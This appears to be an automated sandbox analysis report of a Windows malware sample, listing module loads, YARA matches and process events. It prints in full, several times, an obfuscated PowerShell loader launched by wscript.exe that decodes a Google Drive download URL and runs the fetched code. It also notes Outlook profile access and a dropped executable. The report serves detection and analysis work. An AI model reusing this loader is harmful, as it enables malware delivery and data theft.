Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: qm.Core.pdb?8 source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds I", "0")
Source: Yara match File source: 0000000B.00000002.2356962052.0000000009A96000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2356799011.0000000008860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2333844590.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Foroverbjedes)$global:Unfasting = [System.Text.Encoding]::ASCII.GetString($Stamkortenes)$global:Crispening=$Unfasting.substring($Senehinderne,$Dihydrocuprin)<#Punctualist citoyens Ne
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Coinhere $Drmmetydernes $Hrte), (Effigiating @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Planimetry = [AppDomain]::CurrentDomain.GetAssemblies()$global
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cullays)), $terminsrenternesarsindkomsterne).DefineDynamicModule($Atremata, $false).DefineType($Circumgestation, $Parabelbenenes, [Sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Foroverbjedes)$global:Unfasting = [System.Text.Encoding]::ASCII.GetString($Stamkortenes)$global:Crispening=$Unfasting.substring($Senehinderne,$Dihydrocuprin)<#Punctualist citoyens Ne
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog Jump to behavior
Source: 31437F.exe.25.dr Static PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC3A0942 push E95B3BD0h; ret 8_2_00007FFAAC3A09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC3ACFE8 push esp; retf 8_2_00007FFAAC3ACFE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC474DC9 push ebx; ret 8_2_00007FFAAC474F5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08F23BF3 push es; iretd 11_2_08F23BF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08F23B68 push eax; iretd 11_2_08F23B69
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 25_2_02F03BF3 push es; iretd 25_2_02F03BF4
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 25_2_02F03B68 push eax; iretd 25_2_02F03B69
Source: C:\Windows\SysWOW64\dxdiag.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
